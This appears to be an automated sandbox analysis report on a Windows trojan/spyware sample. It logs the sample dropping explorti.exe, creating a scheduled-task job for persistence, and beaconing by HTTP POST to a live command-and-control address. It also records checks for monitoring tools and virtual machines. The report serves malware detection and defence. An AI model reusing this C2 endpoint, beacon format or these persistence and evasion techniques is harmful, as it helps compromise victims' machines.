Source: global traffic	HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 77.91.77.82 77.91.77.82

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU

Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.82

Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Code function: 7_2_00E9BD30 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,

7_2_00E9BD30

Source: unknown

HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: explorti.exe, 00000007.00000002.2880581504.00000000006FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php
Source: explorti.exe, 00000007.00000002.2880581504.00000000006BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.php
Source: explorti.exe, 00000007.00000002.2880581504.00000000006FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php02k02k02k02k02k02k
Source: explorti.exe, 00000007.00000002.2880581504.00000000006BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpC
Source: explorti.exe, 00000007.00000002.2880581504.00000000006BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpM
Source: explorti.exe, 00000007.00000002.2880581504.00000000006FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpT
Source: explorti.exe, 00000007.00000002.2880581504.00000000006BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpW
Source: explorti.exe, 00000007.00000002.2880581504.00000000006BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpa
Source: explorti.exe, 00000007.00000002.2880581504.00000000006FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpft
Source: explorti.exe, 00000007.00000002.2880581504.00000000006BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpk
Source: explorti.exe, 00000007.00000002.2880581504.00000000006BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpu

System Summary

PE file contains section with special chars

Source: gNo9ad9KO4.exe	Static PE information: section name:
Source: gNo9ad9KO4.exe	Static PE information: section name: .idata
Source: gNo9ad9KO4.exe	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name: .idata
Source: explorti.exe.0.dr	Static PE information: section name:

Creates files inside the system directory

Source: C:\Users\user\Desktop\gNo9ad9KO4.exe

File created: C:\Windows\Tasks\explorti.job

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Code function: 7_2_00E94CD0	7_2_00E94CD0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Code function: 7_2_00ED3048	7_2_00ED3048
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Code function: 7_2_00E9E9B0	7_2_00E9E9B0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Code function: 7_2_00EC7D63	7_2_00EC7D63
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Code function: 7_2_00ED6EE9	7_2_00ED6EE9
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Code function: 7_2_00E94AD0	7_2_00E94AD0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Code function: 7_2_00ED763B	7_2_00ED763B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Code function: 7_2_00ED2BB0	7_2_00ED2BB0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Code function: 7_2_00ED775B	7_2_00ED775B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Code function: 7_2_00ED8700	7_2_00ED8700

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Code function: String function: 00EA7840 appears 32 times

Source: gNo9ad9KO4.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: gNo9ad9KO4.exe	Static PE information: Section: ZLIB complexity 0.9984631147540983
Source: gNo9ad9KO4.exe	Static PE information: Section: adkjkfkz ZLIB complexity 0.9944319686081694
Source: explorti.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9984631147540983
Source: explorti.exe.0.dr	Static PE information: Section: adkjkfkz ZLIB complexity 0.9944319686081694

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@5/3@0/1

Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d

Source: C:\Users\user\Desktop\gNo9ad9KO4.exe

File created: C:\Users\user\AppData\Local\Temp\ad40971b6b

Source: C:\Users\user\Desktop\gNo9ad9KO4.exe

File read: C:\Users\desktop.ini

Source: C:\Users\user\Desktop\gNo9ad9KO4.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: gNo9ad9KO4.exe

Virustotal: Detection: 51%

Source: gNo9ad9KO4.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\gNo9ad9KO4.exe

File read: C:\Users\user\Desktop\gNo9ad9KO4.exe

Source: unknown	Process created: C:\Users\user\Desktop\gNo9ad9KO4.exe "C:\Users\user\Desktop\gNo9ad9KO4.exe"
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe"	Jump to behavior

Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\gNo9ad9KO4.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Detected unpacking (changes PE section rights)

Source: gNo9ad9KO4.exe

Static file information: File size 1894912 > 1048576

Source: gNo9ad9KO4.exe

Static PE information: Raw size of adkjkfkz is bigger than: 0x100000 < 0x19d200

Data Obfuscation

Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Unpacked PE file: 0.2.gNo9ad9KO4.exe.160000.0.unpack :EW;.rsrc:W;.idata :W; :EW;adkjkfkz:EW;afyvsewm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;adkjkfkz:EW;afyvsewm:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Unpacked PE file: 1.2.explorti.exe.e90000.0.unpack :EW;.rsrc:W;.idata :W; :EW;adkjkfkz:EW;afyvsewm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;adkjkfkz:EW;afyvsewm:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Unpacked PE file: 2.2.explorti.exe.e90000.0.unpack :EW;.rsrc:W;.idata :W; :EW;adkjkfkz:EW;afyvsewm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;adkjkfkz:EW;afyvsewm:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Unpacked PE file: 7.2.explorti.exe.e90000.0.unpack :EW;.rsrc:W;.idata :W; :EW;adkjkfkz:EW;afyvsewm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;adkjkfkz:EW;afyvsewm:EW;.taggant:EW;

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

PE file contains an invalid checksum

Source: explorti.exe.0.dr	Static PE information: real checksum: 0x1d691a should be: 0x1d810c
Source: gNo9ad9KO4.exe	Static PE information: real checksum: 0x1d691a should be: 0x1d810c

PE file contains sections with non-standard names

Source: gNo9ad9KO4.exe	Static PE information: section name:
Source: gNo9ad9KO4.exe	Static PE information: section name: .idata
Source: gNo9ad9KO4.exe	Static PE information: section name:
Source: gNo9ad9KO4.exe	Static PE information: section name: adkjkfkz
Source: gNo9ad9KO4.exe	Static PE information: section name: afyvsewm
Source: gNo9ad9KO4.exe	Static PE information: section name: .taggant
Source: explorti.exe.0.dr	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name: .idata
Source: explorti.exe.0.dr	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name: adkjkfkz
Source: explorti.exe.0.dr	Static PE information: section name: afyvsewm
Source: explorti.exe.0.dr	Static PE information: section name: .taggant

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Code function: 7_2_00EAD82C push ecx; ret

7_2_00EAD83F

Source: gNo9ad9KO4.exe	Static PE information: section name: entropy: 7.988500981589288
Source: gNo9ad9KO4.exe	Static PE information: section name: adkjkfkz entropy: 7.953327902515579
Source: explorti.exe.0.dr	Static PE information: section name: entropy: 7.988500981589288
Source: explorti.exe.0.dr	Static PE information: section name: adkjkfkz entropy: 7.953327902515579

Drops PE files

Source: C:\Users\user\Desktop\gNo9ad9KO4.exe

File created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Creates job files (autostart)

Source: C:\Users\user\Desktop\gNo9ad9KO4.exe

File created: C:\Windows\Tasks\explorti.job

Source: C:\Users\user\Desktop\gNo9ad9KO4.exe

Process information set: NOOPENFILEERRORBOX

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
